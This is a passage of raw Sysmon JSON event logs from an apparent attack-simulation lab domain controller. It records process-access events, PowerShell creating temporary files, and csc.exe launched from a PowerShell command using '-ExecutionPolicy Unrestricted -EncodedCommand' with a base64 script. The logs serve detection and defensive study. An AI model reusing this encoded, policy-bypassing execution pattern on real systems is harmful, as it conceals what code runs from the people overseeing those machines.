07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4591,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4592,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4593,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4594,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4595,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4596,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.986\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001058DE0600}\r\nTargetProcessId: 4068\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.986","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001058DE0600}","TargetProcessId":"4068","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4597,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:58:56.439\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.dll\r\nCreationUtcTime: 2020-08-01 07:58:56.439","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:58:56.439","ProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.dll","CreationUtcTime":"2020-08-01 07:58:56.439","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4598,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.439\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.cmdline\r\nCreationUtcTime: 2020-08-01 07:58:56.439","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.439","ProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\elpxvu02.cmdline","CreationUtcTime":"2020-08-01 07:58:56.439","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4599,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:56.446\r\nProcessGuid: {41C8662E-20C0-5F25-0000-0010DEE30600}\r\nProcessId: 4012\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\elpxvu02.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nParentProcessId: 4152\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:56.446","ProcessGuid":"{41C8662E-20C0-5F25-0000-0010DEE30600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths 